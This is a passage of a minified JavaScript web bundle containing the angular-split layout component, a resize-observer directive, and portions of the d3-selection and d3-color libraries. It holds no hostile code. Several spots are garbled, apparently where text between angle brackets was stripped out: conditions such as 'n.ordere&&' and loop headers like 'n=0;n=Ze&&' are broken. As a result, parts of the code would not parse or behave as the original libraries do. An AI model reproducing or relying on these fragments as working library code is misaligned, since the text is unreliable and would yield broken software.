J,this.dragProgress$=this.dragProgressSubject.asObservable(),this.isDragging=!1,this.isWaitingClear=!1,this.isWaitingInitialMove=!1,this.dragListeners=[],this.snapshot=null,this.startPoint=null,this.endPoint=null,this.displayedAreas=[],this.hiddenAreas=[],this._clickTimeout=null,this.direction=this._direction,this._config=c?Object.assign(this._config,c):this._config,Object.keys(this._config).forEach(d=>{this[d]=this._config[d]})}set direction(e){this._direction="vertical"===e?"vertical":"horizontal",this.renderer.addClass(this.elRef.nativeElement,`as-${this._direction}`),this.renderer.removeClass(this.elRef.nativeElement,"as-"+("vertical"===this._direction?"horizontal":"vertical")),this.build(!1,!1)}get direction(){return this._direction}set unit(e){this._unit="pixel"===e?"pixel":"percent",this.renderer.addClass(this.elRef.nativeElement,`as-${this._unit}`),this.renderer.removeClass(this.elRef.nativeElement,"as-"+("pixel"===this._unit?"percent":"pixel")),this.build(!1,!0)}get unit(){return this._unit}set gutterSize(e){this._gutterSize=Ep(e,11),this.build(!1,!1)}get gutterSize(){return this._gutterSize}set gutterStep(e){this._gutterStep=Ep(e,1)}get gutterStep(){return this._gutterStep}set restrictMove(e){this._restrictMove=Db(e)}get restrictMove(){return this._restrictMove}set useTransition(e){this._useTransition=Db(e),this._useTransition?this.renderer.addClass(this.elRef.nativeElement,"as-transition"):this.renderer.removeClass(this.elRef.nativeElement,"as-transition")}get useTransition(){return this._useTransition}set disabled(e){this._disabled=Db(e),this._disabled?this.renderer.addClass(this.elRef.nativeElement,"as-disabled"):this.renderer.removeClass(this.elRef.nativeElement,"as-disabled")}get disabled(){return this._disabled}set dir(e){this._dir="rtl"===e?"rtl":"ltr",this.renderer.setAttribute(this.elRef.nativeElement,"dir",this._dir)}get dir(){return this._dir}set gutterDblClickDuration(e){this._gutterDblClickDuration=Ep(e,0)}get gutterDblClickDuration(){return this._gutterDblClickDuration}get transitionEnd(){return new G(e=>this.transitionEndSubscriber=e).pipe(lp(20))}ngAfterViewInit(){this.ngZone.runOutsideAngular(()=>{setTimeout(()=>this.renderer.addClass(this.elRef.nativeElement,"as-init"))})}getNbGutters(){return 0===this.displayedAreas.length?0:this.displayedAreas.length-1}addArea(e){const i={component:e,order:0,size:0,minSize:null,maxSize:null,sizeBeforeCollapse:null,gutterBeforeCollapse:0};!0===e.visible?(this.displayedAreas.push(i),this.build(!0,!0)):this.hiddenAreas.push(i)}removeArea(e){if(this.displayedAreas.some(i=>i.component===e)){const i=this.displayedAreas.find(n=>n.component===e);this.displayedAreas.splice(this.displayedAreas.indexOf(i),1),this.build(!0,!0)}else if(this.hiddenAreas.some(i=>i.component===e)){const i=this.hiddenAreas.find(n=>n.component===e);this.hiddenAreas.splice(this.hiddenAreas.indexOf(i),1)}}updateArea(e,i,n){!0===e.visible&&this.build(i,n)}showArea(e){const i=this.hiddenAreas.find(r=>r.component===e);if(void 0===i)return;const n=this.hiddenAreas.splice(this.hiddenAreas.indexOf(i),1);this.displayedAreas.push(...n),this.build(!0,!0)}hideArea(e){const i=this.displayedAreas.find(r=>r.component===e);if(void 0===i)return;const n=this.displayedAreas.splice(this.displayedAreas.indexOf(i),1);n.forEach(r=>{r.order=0,r.size=0}),this.hiddenAreas.push(...n),this.build(!0,!0)}getVisibleAreaSizes(){return this.displayedAreas.map(e=>null===e.size?"*":e.size)}setVisibleAreaSizes(e){if(e.length!==this.displayedAreas.length)return!1;const i=e.map(r=>Ep(r,null));return!1!==oH(this.unit,i)&&(this.displayedAreas.forEach((r,c)=>r.component._size=i[c]),this.build(!1,!0),!0)}build(e,i){if(this.stopDragging(),!0===e&&(this.displayedAreas.every(n=>null!==n.component.order)&&this.displayedAreas.sort((n,r)=>n.component.order-r.component.order),this.displayedAreas.forEach((n,r)=>{n.order=2*r,n.component.setStyleOrder(n.order)})),!0===i){const n=oH(this.unit,this.displayedAreas.map(r=>r.component.size));switch(this.unit){case"percent":{const r=100/this.displayedAreas.length;this.displayedAreas.forEach(c=>{c.size=n?c.component.size:r,c.minSize=PA(c),c.maxSize=OA(c)});break}case"pixel":if(n)this.displayedAreas.forEach(r=>{r.size=r.component.size,r.minSize=PA(r),r.maxSize=OA(r)});else{const r=this.displayedAreas.filter(c=>null===c.component.size);if(0===r.length&&this.displayedAreas.length>0)this.displayedAreas.forEach((c,d)=>{c.size=0===d?null:c.component.size,c.minSize=0===d?null:PA(c),c.maxSize=0===d?null:OA(c)});else if(r.length>1){let c=!1;this.displayedAreas.forEach(d=>{null===d.component.size?!1===c?(d.size=null,d.minSize=null,d.maxSize=null,c=!0):(d.size=100,d.minSize=null,d.maxSize=null):(d.size=d.component.size,d.minSize=PA(d),d.maxSize=OA(d))})}}}}this.refreshStyleSizes(),this.cdRef.markForCheck()}refreshStyleSizes(){if("percent"===this.unit)if(1===this.displayedAreas.length)this.displayedAreas[0].component.setStyleFlex(0,0,"100%",!1,!1);else{const e=this.getNbGutters()*this.gutterSize;this.displayedAreas.forEach(i=>{i.component.setStyleFlex(0,0,`calc( ${i.size}% - ${i.size/100*e}px )`,null!==i.minSize&&i.minSize===i.size,null!==i.maxSize&&i.maxSize===i.size)})}else"pixel"===this.unit&&this.displayedAreas.forEach(e=>{null===e.size?e.component.setStyleFlex(1,1,1===this.displayedAreas.length?"100%":"auto",!1,!1):1===this.displayedAreas.length?e.component.setStyleFlex(0,0,"100%",!1,!1):e.component.setStyleFlex(0,0,`${e.size}px`,null!==e.minSize&&e.minSize===e.size,null!==e.maxSize&&e.maxSize===e.size)})}clickGutter(e,i){const n=Eb(e);this.startPoint&&aH(this.startPoint,n,this.gutterClickDeltaPx)&&(!this.isDragging||this.isWaitingInitialMove)&&(null!==this._clickTimeout?(window.clearTimeout(this._clickTimeout),this._clickTimeout=null,this.notify("dblclick",i),this.stopDragging()):this._clickTimeout=window.setTimeout(()=>{this._clickTimeout=null,this.notify("click",i),this.stopDragging()},this.gutterDblClickDuration))}startKeyboardDrag(e,i,n){if(!0===this.disabled||!0===this.isWaitingClear)return;const r=function IMe(t,a){if("horizontal"===a)switch(t.key){case"ArrowLeft":case"ArrowRight":case"PageUp":case"PageDown":break;default:return null}if("vertical"===a)switch(t.key){case"ArrowUp":case"ArrowDown":case"PageUp":case"PageDown":break;default:return null}const e=t.currentTarget,i="PageUp"===t.key||"PageDown"===t.key?500:50;let n=e.offsetLeft,r=e.offsetTop;switch(t.key){case"ArrowLeft":n-=i;break;case"ArrowRight":n+=i;break;case"ArrowUp":r-=i;break;case"ArrowDown":r+=i;break;case"PageUp":"vertical"===a?r-=i:n+=i;break;case"PageDown":"vertical"===a?r+=i:n-=i;break;default:return null}return{x:n,y:r}}(e,this.direction);null!==r&&(this.endPoint=r,this.startPoint=Eb(e),e.preventDefault(),e.stopPropagation(),this.setupForDragEvent(i,n),this.startDragging(),this.drag(),this.stopDragging())}startMouseDrag(e,i,n){e.preventDefault(),e.stopPropagation(),this.startPoint=Eb(e),null!==this.startPoint&&!0!==this.disabled&&!0!==this.isWaitingClear&&(this.setupForDragEvent(i,n),this.dragListeners.push(this.renderer.listen("document","mouseup",this.stopDragging.bind(this))),this.dragListeners.push(this.renderer.listen("document","touchend",this.stopDragging.bind(this))),this.dragListeners.push(this.renderer.listen("document","touchcancel",this.stopDragging.bind(this))),this.ngZone.runOutsideAngular(()=>{this.dragListeners.push(this.renderer.listen("document","mousemove",this.mouseDragEvent.bind(this))),this.dragListeners.push(this.renderer.listen("document","touchmove",this.mouseDragEvent.bind(this)))}),this.startDragging())}setupForDragEvent(e,i){this.snapshot={gutterNum:i,lastSteppedOffset:0,allAreasSizePixel:nH(this.elRef,this.direction)-this.getNbGutters()*this.gutterSize,allInvolvedAreasSizePercent:100,areasBeforeGutter:[],areasAfterGutter:[]},this.displayedAreas.forEach(n=>{const r={area:n,sizePixelAtStart:nH(n.component.elRef,this.direction),sizePercentAtStart:"percent"===this.unit?n.size:-1};n.ordere&&(!0===this.restrictMove?0===this.snapshot.areasAfterGutter.length&&(this.snapshot.areasAfterGutter=[r]):this.snapshot.areasAfterGutter.push(r))}),this.snapshot.allInvolvedAreasSizePercent=[...this.snapshot.areasBeforeGutter,...this.snapshot.areasAfterGutter].reduce((n,r)=>n+r.sizePercentAtStart,0)}startDragging(){this.displayedAreas.forEach(e=>e.component.lockEvents()),this.isDragging=!0,this.isWaitingInitialMove=!0}mouseDragEvent(e){e.preventDefault(),e.stopPropagation();const i=Eb(e);null!==this._clickTimeout&&!aH(this.startPoint,i,this.gutterClickDeltaPx)&&(window.clearTimeout(this._clickTimeout),this._clickTimeout=null),!1!==this.isDragging&&(this.endPoint=Eb(e),null!==this.endPoint&&this.drag())}drag(){if(this.isWaitingInitialMove){if(this.startPoint.x===this.endPoint.x&&this.startPoint.y===this.endPoint.y)return;this.ngZone.run(()=>{this.isWaitingInitialMove=!1,this.renderer.addClass(this.elRef.nativeElement,"as-dragging"),this.renderer.addClass(this.gutterEls.toArray()[this.snapshot.gutterNum-1].nativeElement,"as-dragged"),this.notify("start",this.snapshot.gutterNum)})}let e="horizontal"===this.direction?this.startPoint.x-this.endPoint.x:this.startPoint.y-this.endPoint.y;"rtl"===this.dir&&(e=-e);const i=Math.round(e/this.gutterStep)*this.gutterStep;if(i===this.snapshot.lastSteppedOffset)return;this.snapshot.lastSteppedOffset=i;let n=X1(this.unit,this.snapshot.areasBeforeGutter,-i,this.snapshot.allAreasSizePixel),r=X1(this.unit,this.snapshot.areasAfterGutter,i,this.snapshot.allAreasSizePixel);if(0!==n.remain&&0!==r.remain?Math.abs(n.remain)===Math.abs(r.remain)||(Math.abs(n.remain)>Math.abs(r.remain)?r=X1(this.unit,this.snapshot.areasAfterGutter,i+n.remain,this.snapshot.allAreasSizePixel):n=X1(this.unit,this.snapshot.areasBeforeGutter,-(i-r.remain),this.snapshot.allAreasSizePixel)):0!==n.remain?r=X1(this.unit,this.snapshot.areasAfterGutter,i+n.remain,this.snapshot.allAreasSizePixel):0!==r.remain&&(n=X1(this.unit,this.snapshot.areasBeforeGutter,-(i-r.remain),this.snapshot.allAreasSizePixel)),"percent"===this.unit){const c=[...n.list,...r.list],d=c.find(T=>0!==T.percentAfterAbsorption&&T.percentAfterAbsorption!==T.areaSnapshot.area.minSize&&T.percentAfterAbsorption!==T.areaSnapshot.area.maxSize);d&&(d.percentAfterAbsorption=this.snapshot.allInvolvedAreasSizePercent-c.filter(T=>T!==d).reduce((T,k)=>T+k.percentAfterAbsorption,0))}n.list.forEach(c=>rH(this.unit,c)),r.list.forEach(c=>rH(this.unit,c)),this.refreshStyleSizes(),this.notify("progress",this.snapshot.gutterNum)}stopDragging(e){if(e&&(e.preventDefault(),e.stopPropagation()),!1!==this.isDragging){for(this.displayedAreas.forEach(i=>i.component.unlockEvents());this.dragListeners.length>0;){const i=this.dragListeners.pop();i&&i()}this.isDragging=!1,!1===this.isWaitingInitialMove&&this.notify("end",this.snapshot.gutterNum),this.renderer.removeClass(this.elRef.nativeElement,"as-dragging"),this.renderer.removeClass(this.gutterEls.toArray()[this.snapshot.gutterNum-1].nativeElement,"as-dragged"),this.snapshot=null,this.isWaitingClear=!0,this.ngZone.runOutsideAngular(()=>{setTimeout(()=>{this.startPoint=null,this.endPoint=null,this.isWaitingClear=!1})})}}notify(e,i){const n=this.getVisibleAreaSizes();"start"===e?this.dragStart.emit({gutterNum:i,sizes:n}):"end"===e?this.dragEnd.emit({gutterNum:i,sizes:n}):"click"===e?this.gutterClick.emit({gutterNum:i,sizes:n}):"dblclick"===e?this.gutterDblClick.emit({gutterNum:i,sizes:n}):"transitionEnd"===e?this.transitionEndSubscriber&&this.ngZone.run(()=>this.transitionEndSubscriber.next(n)):"progress"===e&&this.dragProgressSubject.next({gutterNum:i,sizes:n})}ngOnDestroy(){this.stopDragging()}collapseArea(e,i,n){const r=this.displayedAreas.find(T=>T.component===e);if(void 0===r)return;const c="right"===n?1:-1;r.sizeBeforeCollapse||(r.sizeBeforeCollapse=r.size,r.gutterBeforeCollapse=c),r.size=i;const d=this.gutterEls.find(T=>T.nativeElement.style.order===`${r.order+c}`);d&&this.renderer.addClass(d.nativeElement,"as-split-gutter-collapsed"),this.updateArea(e,!1,!1)}expandArea(e){const i=this.displayedAreas.find(r=>r.component===e);if(void 0===i||!i.sizeBeforeCollapse)return;i.size=i.sizeBeforeCollapse,i.sizeBeforeCollapse=null;const n=this.gutterEls.find(r=>r.nativeElement.style.order===`${i.order+i.gutterBeforeCollapse}`);n&&this.renderer.removeClass(n.nativeElement,"as-split-gutter-collapsed"),this.updateArea(e,!1,!1)}getAriaAreaSizeText(e){return null===e?null:e.toFixed(0)+" "+this.unit}}return t.\u0275fac=function(e){return new(e||t)(Ee(qi),Ee(mi),Ee(Ma),Ee(wr),Ee(PMe,8))},t.\u0275cmp=Wt({type:t,selectors:[["as-split"]],viewQuery:function(e,i){if(1&e&&Mi(EMe,5),2&e){let n;Vt(n=Bt())&&(i.gutterEls=n)}},inputs:{direction:"direction",unit:"unit",gutterSize:"gutterSize",gutterStep:"gutterStep",restrictMove:"restrictMove",useTransition:"useTransition",disabled:"disabled",dir:"dir",gutterDblClickDuration:"gutterDblClickDuration",gutterClickDeltaPx:"gutterClickDeltaPx",gutterAriaLabel:"gutterAriaLabel"},outputs:{transitionEnd:"transitionEnd",dragStart:"dragStart",dragEnd:"dragEnd",gutterClick:"gutterClick",gutterDblClick:"gutterDblClick"},exportAs:["asSplit"],ngContentSelectors:wMe,decls:2,vars:1,consts:[["ngFor","",3,"ngForOf"],["role","slider","tabindex","0","class","as-split-gutter",3,"flex-basis","order","keydown","mousedown","touchstart","mouseup","touchend",4,"ngIf"],["role","slider","tabindex","0",1,"as-split-gutter",3,"keydown","mousedown","touchstart","mouseup","touchend"],["gutterEls",""],[1,"as-split-gutter-icon"]],template:function(e,i){1&e&&(Jn(),va(0),ne(1,xMe,1,1,"ng-template",0)),2&e&&(g(1),F("ngForOf",i.displayedAreas))},dependencies:[Zi,Ri],styles:["[_nghost-%COMP%]{display:flex;flex-wrap:nowrap;justify-content:flex-start;align-items:stretch;overflow:hidden;width:100%;height:100%}[_nghost-%COMP%] > .as-split-gutter[_ngcontent-%COMP%]{border:none;flex-grow:0;flex-shrink:0;background-color:#eee;display:flex;align-items:center;justify-content:center}[_nghost-%COMP%] > .as-split-gutter.as-split-gutter-collapsed[_ngcontent-%COMP%]{flex-basis:1px!important;pointer-events:none}[_nghost-%COMP%] > .as-split-gutter[_ngcontent-%COMP%] > .as-split-gutter-icon[_ngcontent-%COMP%]{width:100%;height:100%;background-position:center center;background-repeat:no-repeat}[_nghost-%COMP%] >.as-split-area{flex-grow:0;flex-shrink:0;overflow-x:hidden;overflow-y:auto}[_nghost-%COMP%] >.as-split-area.as-hidden{flex:0 1 0px!important;overflow-x:hidden;overflow-y:hidden}.as-horizontal[_nghost-%COMP%]{flex-direction:row}.as-horizontal[_nghost-%COMP%] > .as-split-gutter[_ngcontent-%COMP%]{flex-direction:row;cursor:col-resize;height:100%}.as-horizontal[_nghost-%COMP%] > .as-split-gutter[_ngcontent-%COMP%] > .as-split-gutter-icon[_ngcontent-%COMP%]{background-image:url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAUAAAAeCAYAAADkftS9AAAAIklEQVQoU2M4c+bMfxAGAgYYmwGrIIiDjrELjpo5aiZeMwF+yNnOs5KSvgAAAABJRU5ErkJggg==)}.as-horizontal[_nghost-%COMP%] >.as-split-area{height:100%}.as-vertical[_nghost-%COMP%]{flex-direction:column}.as-vertical[_nghost-%COMP%] > .as-split-gutter[_ngcontent-%COMP%]{flex-direction:column;cursor:row-resize;width:100%}.as-vertical[_nghost-%COMP%] > .as-split-gutter[_ngcontent-%COMP%] .as-split-gutter-icon[_ngcontent-%COMP%]{background-image:url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAB4AAAAFCAMAAABl/6zIAAAABlBMVEUAAADMzMzIT8AyAAAAAXRSTlMAQObYZgAAABRJREFUeAFjYGRkwIMJSeMHlBkOABP7AEGzSuPKAAAAAElFTkSuQmCC)}.as-vertical[_nghost-%COMP%] >.as-split-area{width:100%}.as-vertical[_nghost-%COMP%] >.as-split-area.as-hidden{max-width:0}.as-disabled[_nghost-%COMP%] > .as-split-gutter[_ngcontent-%COMP%]{cursor:default}.as-disabled[_nghost-%COMP%] > .as-split-gutter[_ngcontent-%COMP%] .as-split-gutter-icon[_ngcontent-%COMP%]{background-image:url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAUAAAAeCAYAAADkftS9AAAAIklEQVQoU2M4c+bMfxAGAgYYmwGrIIiDjrELjpo5aiZeMwF+yNnOs5KSvgAAAABJRU5ErkJggg==)}.as-transition.as-init[_nghost-%COMP%]:not(.as-dragging) > .as-split-gutter[_ngcontent-%COMP%], .as-transition.as-init[_nghost-%COMP%]:not(.as-dragging) >.as-split-area{transition:flex-basis .3s}"],changeDetection:0}),t})(),Dp=(()=>{class t{constructor(e,i,n,r){this.ngZone=e,this.elRef=i,this.renderer=n,this.split=r,this._order=null,this._size=null,this._minSize=null,this._maxSize=null,this._lockSize=!1,this._visible=!0,this.lockListeners=[],this.renderer.addClass(this.elRef.nativeElement,"as-split-area")}set order(e){this._order=Ep(e,null),this.split.updateArea(this,!0,!1)}get order(){return this._order}set size(e){this._size=Ep(e,null),this.split.updateArea(this,!1,!0)}get size(){return this._size}set minSize(e){this._minSize=Ep(e,null),this.split.updateArea(this,!1,!0)}get minSize(){return this._minSize}set maxSize(e){this._maxSize=Ep(e,null),this.split.updateArea(this,!1,!0)}get maxSize(){return this._maxSize}set lockSize(e){this._lockSize=Db(e),this.split.updateArea(this,!1,!0)}get lockSize(){return this._lockSize}set visible(e){this._visible=Db(e),this._visible?(this.split.showArea(this),this.renderer.removeClass(this.elRef.nativeElement,"as-hidden")):(this.split.hideArea(this),this.renderer.addClass(this.elRef.nativeElement,"as-hidden"))}get visible(){return this._visible}ngOnInit(){this.split.addArea(this),this.ngZone.runOutsideAngular(()=>{this.transitionListener=this.renderer.listen(this.elRef.nativeElement,"transitionend",e=>{"flex-basis"===e.propertyName&&this.split.notify("transitionEnd",-1)})})}setStyleOrder(e){this.renderer.setStyle(this.elRef.nativeElement,"order",e)}setStyleFlex(e,i,n,r,c){this.renderer.setStyle(this.elRef.nativeElement,"flex-grow",e),this.renderer.setStyle(this.elRef.nativeElement,"flex-shrink",i),this.renderer.setStyle(this.elRef.nativeElement,"flex-basis",n),!0===r?this.renderer.addClass(this.elRef.nativeElement,"as-min"):this.renderer.removeClass(this.elRef.nativeElement,"as-min"),!0===c?this.renderer.addClass(this.elRef.nativeElement,"as-max"):this.renderer.removeClass(this.elRef.nativeElement,"as-max")}lockEvents(){this.ngZone.runOutsideAngular(()=>{this.lockListeners.push(this.renderer.listen(this.elRef.nativeElement,"selectstart",()=>!1)),this.lockListeners.push(this.renderer.listen(this.elRef.nativeElement,"dragstart",()=>!1))})}unlockEvents(){for(;this.lockListeners.length>0;){const e=this.lockListeners.pop();e&&e()}}ngOnDestroy(){this.unlockEvents(),this.transitionListener&&this.transitionListener(),this.split.removeArea(this)}collapse(e=0,i="right"){this.split.collapseArea(this,e,i)}expand(){this.split.expandArea(this)}}return t.\u0275fac=function(e){return new(e||t)(Ee(qi),Ee(mi),Ee(wr),Ee(Zh))},t.\u0275dir=Ot({type:t,selectors:[["as-split-area"],["","as-split-area",""]],inputs:{order:"order",size:"size",minSize:"minSize",maxSize:"maxSize",lockSize:"lockSize",visible:"visible"},exportAs:["asSplitArea"]}),t})(),sH=(()=>{class t{static forRoot(){return console.warn("AngularSplitModule.forRoot() is deprecated and will be removed in v6"),{ngModule:t,providers:[]}}static forChild(){return console.warn("AngularSplitModule.forChild() is deprecated and will be removed in v6"),{ngModule:t,providers:[]}}}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({imports:[rn]}),t})();class xb{constructor(a,e){this.newRect=a,this.oldRect=e,this.isFirst=null==e}}let OMe=(()=>{class t{constructor(e,i){this.element=e,this.zone=i,this.resized=new Tt,this.observer=new ResizeObserver(n=>this.zone.run(()=>this.observe(n)))}ngOnInit(){this.observer.observe(this.element.nativeElement)}ngOnDestroy(){this.observer.disconnect()}observe(e){const i=e[0],n=new xb(i.contentRect,this.oldRect);this.oldRect=i.contentRect,this.resized.emit(n)}}return t.\u0275fac=function(e){return new(e||t)(Ee(mi),Ee(qi))},t.\u0275dir=Ot({type:t,selectors:[["","resized",""]],outputs:{resized:"resized"}}),t})(),cH=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({}),t})();function NMe(){}function iI(t){return null==t?NMe:function(){return this.querySelector(t)}}function lH(t){return"object"==typeof t&&"length"in t?t:Array.from(t)}function zMe(){return[]}function dH(t){return null==t?zMe:function(){return this.querySelectorAll(t)}}function mH(t){return function(){return this.matches(t)}}function uH(t){return function(a){return a.matches(t)}}var VMe=Array.prototype.find;function HMe(){return this.firstElementChild}var qMe=Array.prototype.filter;function GMe(){return this.children}function hH(t){return new Array(t.length)}function NA(t,a){this.ownerDocument=t.ownerDocument,this.namespaceURI=t.namespaceURI,this._next=null,this._parent=t,this.__data__=a}function XMe(t){return function(){return t}}function YMe(t,a,e,i,n,r){for(var d,c=0,T=a.length,k=r.length;ca?1:t>=a?0:NaN}NA.prototype={constructor:NA,appendChild:function(t){return this._parent.insertBefore(t,this._next)},insertBefore:function(t,a){return this._parent.insertBefore(t,a)},querySelector:function(t){return this._parent.querySelector(t)},querySelectorAll:function(t){return this._parent.querySelectorAll(t)}};var aI="http://www.w3.org/1999/xhtml";const fH={svg:"http://www.w3.org/2000/svg",xhtml:aI,xlink:"http://www.w3.org/1999/xlink",xml:"http://www.w3.org/XML/1998/namespace",xmlns:"http://www.w3.org/2000/xmlns/"};function LA(t){var a=t+="",e=a.indexOf(":");return e>=0&&"xmlns"!==(a=t.slice(0,e))&&(t=t.slice(e+1)),fH.hasOwnProperty(a)?{space:fH[a],local:t}:t}function hve(t){return function(){this.removeAttribute(t)}}function fve(t){return function(){this.removeAttributeNS(t.space,t.local)}}function pve(t,a){return function(){this.setAttribute(t,a)}}function _ve(t,a){return function(){this.setAttributeNS(t.space,t.local,a)}}function gve(t,a){return function(){var e=a.apply(this,arguments);null==e?this.removeAttribute(t):this.setAttribute(t,e)}}function Cve(t,a){return function(){var e=a.apply(this,arguments);null==e?this.removeAttributeNS(t.space,t.local):this.setAttributeNS(t.space,t.local,e)}}function pH(t){return t.ownerDocument&&t.ownerDocument.defaultView||t.document&&t||t.defaultView}function bve(t){return function(){this.style.removeProperty(t)}}function Mve(t,a,e){return function(){this.style.setProperty(t,a,e)}}function vve(t,a,e){return function(){var i=a.apply(this,arguments);null==i?this.style.removeProperty(t):this.style.setProperty(t,i,e)}}function Y1(t,a){return t.style.getPropertyValue(a)||pH(t).getComputedStyle(t,null).getPropertyValue(a)}function Tve(t){return function(){delete this[t]}}function Eve(t,a){return function(){this[t]=a}}function Dve(t,a){return function(){var e=a.apply(this,arguments);null==e?delete this[t]:this[t]=e}}function _H(t){return t.trim().split(/^|\s+/)}function nI(t){return t.classList||new gH(t)}function gH(t){this._node=t,this._names=_H(t.getAttribute("class")||"")}function CH(t,a){for(var e=nI(t),i=-1,n=a.length;++i=0&&(e=a.slice(i+1),a=a.slice(0,i)),{type:a,name:e}})}function a4e(t){return function(){var a=this.__on;if(a){for(var r,e=0,i=-1,n=a.length;e=0&&(this._names.splice(a,1),this._node.setAttribute("class",this._names.join(" ")))},contains:function(t){return this._names.indexOf(t)>=0}};var vH=[null];function Il(t,a){this._groups=t,this._parents=a}function AH(){return new Il([[document.documentElement]],vH)}Il.prototype=AH.prototype={constructor:Il,select:function LMe(t){"function"!=typeof t&&(t=iI(t));for(var a=this._groups,e=a.length,i=new Array(e),n=0;n=Ze&&(Ze=ut+1);!(It=Ne[Ze])&&++Ze=0;)(c=i[n])&&(r&&4^c.compareDocumentPosition(r)&&r.parentNode.insertBefore(c,r),r=c);return this},sort:function ove(t){function a(Y,te){return Y&&te?t(Y.__data__,te.__data__):!Y-!te}t||(t=rve);for(var e=this._groups,i=e.length,n=new Array(i),r=0;r1?this.each((null==a?bve:"function"==typeof a?vve:Mve)(t,a,null==e?"":e)):Y1(this.node(),t)},property:function xve(t,a){return arguments.length>1?this.each((null==a?Tve:"function"==typeof a?Dve:Eve)(t,a)):this.node()[t]},classed:function Sve(t,a){var e=_H(t+"");if(arguments.length<2){for(var i=nI(this.node()),n=-1,r=e.length;++n{}};function TH(){for(var i,t=0,a=arguments.length,e={};t=0&&(i=e.slice(n+1),e=e.slice(0,n)),e&&!a.hasOwnProperty(e))throw new Error("unknown type: "+e);return{type:e,name:i}})}function h4e(t,a){for(var n,e=0,i=t.length;e0)for(var n,r,e=new Array(n),i=0;i>8&15|a>>4&240,a>>4&15|240&a,(15&a)<<4|15&a,1):8===e?FA(a>>24&255,a>>16&255,a>>8&255,(255&a)/255):4===e?FA(a>>12&15|a>>8&240,a>>8&15|a>>4&240,a>>4&15|240&a,((15&a)<<4|15&a)/255):null):(a=g4e.exec(t))?new $l(a[1],a[2],a[3],1):(a=C4e.exec(t))?new $l(255*a[1]/100,255*a[2]/100,255*a[3]/100,1):(a=y4e.exec(t))?FA(a[1],a[2],a[3],a[4]):(a=b4e.exec(t))?FA(255*a[1]/100,255*a[2]/100,255*a[3]/100,a[4]):(a=M4e.exec(t))?OH(a[1],a[2]/100,a[3]/100,1):(a=v4e.exec(t))?OH(a[1],a[2]/100,a[3]/100,a[4]):wH.hasOwnProperty(t)?SH(wH[t]):"transparent"===t?new $l(NaN,NaN,NaN,0):null}function SH(t){return new $l(t>>16&255,t>>8&255,255&t,1)}function FA(t,a,e,i){return i<=0&&(t=a=e=NaN),new $l(t,a,e,i)}function T4e(t){return t instanceof Ib||(t=Dg(t)),t?new $l((t=t.rgb()).r,t.g,t.b,t.opacity):new $l}function VA(t,a,e,i){return 1===arguments.length?T4e(t):new $l(t,a,e,null==i?1:i)}function $l(t,a,e,i){this.r=+t,this.g=+a,this.b=+e,this.opacity=+i}function kH(){return"#"+sI(this.r)+sI(this.g)+sI(this.b)}function PH(){var t=this.opacity;return(1===(t=isNaN(t)?1:Math.max(0,Math.min(1,t)))?"rgb(":"rgba(")+Math.max(0,Math.min(255,Math.round(this.r)||0))+", "+Math.max(0,Math.min(255,Math.round(this.g)||0))+", "+Math.max(0,Math.min(255,Math.round(this.b)||0))+(1===t?")":", "+t+")")}function sI(t){return((t=Math.max(0,Math.min(255,Math.round(t)||0)))<16?"0":"")+t.toString(16)}function OH(t,a,e,i){return i<=0?t=a=e=NaN:e<=0||e>=1?t=a=NaN:a<=0&&(t=NaN),new Iu(t,a,e,i)}function NH(t){if(t instanceof Iu)return new Iu(t.h,t.s,t.l,t.opacity);if(t instanceof Ib||(t=Dg(t)),!t)return new Iu;if(t instanceof Iu)return t;var a=(t=t.rgb()).r/255,e=t.g/255,i=t.b/255,n=Math.min(a,e,i),r=Math.max(a,e,i),c=NaN,d=r-n,T=(r+n)/2;return d?(c=a===r?(e-i)/d+6*(e0&&T<1?0:c,new Iu(c,d,T,t.opacity)}function Iu(t,a,e,i){this.h=+t,this.s=+a,this.l=+e,this.opacity=+i}function cI(t,a,e){return 255*(t<60?a+(e-a)*t/60:t<180?e:t<240?a+(e-a)*(240-t)/60:a)}function LH(t,a,e,i,n){var r=t*t,c=r*t;return((1-3*t+3*r-c)*a+(4-6*r+3*c)*e+(1+3*t+3*r-3*c)*i+c*n)/6}rI(Ib,Dg,{copy:function(t){return Object.assign(new this.constructor,this,t)},displayable:function(){return this.rgb().displayable()},hex:IH,formatHex:IH,formatHsl:function A4e(){return NH(this).formatHsl()},formatRgb:RH,toString:RH}),rI($l,VA,xH(Ib,{brighter:function(t){return t=null==t?WA:Math.pow(WA,t),new $l(this.r*t,this.g*t,this.b*t,this.opacity)},darker:function(t){return t=null==t?.7:Math.pow(.7,t),new $l(this.r*t,this.g*t,this.b*t,this.opacity)},rgb:function(){return this},displayable:function(){return-.5<=this.r&&this.r<255.5&&-.5<=this.g&&this.g<255.5&&-.5<=this.b&&this.b<255.5&&0<=this.opacity&&this.opacity<=1},hex:kH,formatHex:kH,formatRgb:PH,toString:PH})),rI(Iu,function E4e(t,a,e,i){return 1===arguments.length?NH(t):new Iu(t,a,e,null==i?1:i)},xH(Ib,{brighter:function(t){return t=null==t?WA:Math.pow(WA,t),new Iu(this.h,this.s,this.l*t,this.opacity)},darker:function(t){return t=null==t?.7:Math.pow(.7,t),new Iu(this.h,this.s,this.l*t,this.opacity)},rgb:function(){var t=this.h%360+360*(this.h<0),a=isNaN(t)||isNaN(this.s)?0:this.s,e=this.l,i=e+(e<.5?e:1-e)*a,n=2*e-i;return new $l(cI(t>=240?t-240:t+120,n,i),cI(t,n,i),cI(t<120?t+240:t-120,n,i),this.opacity)},displayable:function(){return(0<=this.s&&this.s<=1||isNaN(this.s))&&0<=this.l&&this.l<=1&&0<=this.opacity&&this.opacity<=1},formatHsl:function(){var t=this.opacity;return(1===(t=isNaN(t)?1:Math.max(0,Math.min(1,t)))?"hsl(":"hsla(")+(this.h||0)+", "+100*(this.s||0)+"%, "+100*(this.l||0)+"%"+(1===t?")":", "+t+")")}}));const lI=t=>()=>t;function WH(t,a){var e=a-t;return e?function zH(t,a){return function(e){return t+e*a}}(t,e):lI(isNaN(t)?a:t)}const BA=function t(a){var e=function I4e(t){return 1==(t=+t)?WH:function(a,e){return e-a?function w4e(t,a,e){return t=Math.pow(t,e),a=Math.pow(a,e)-t,e=1/e,function(i){return 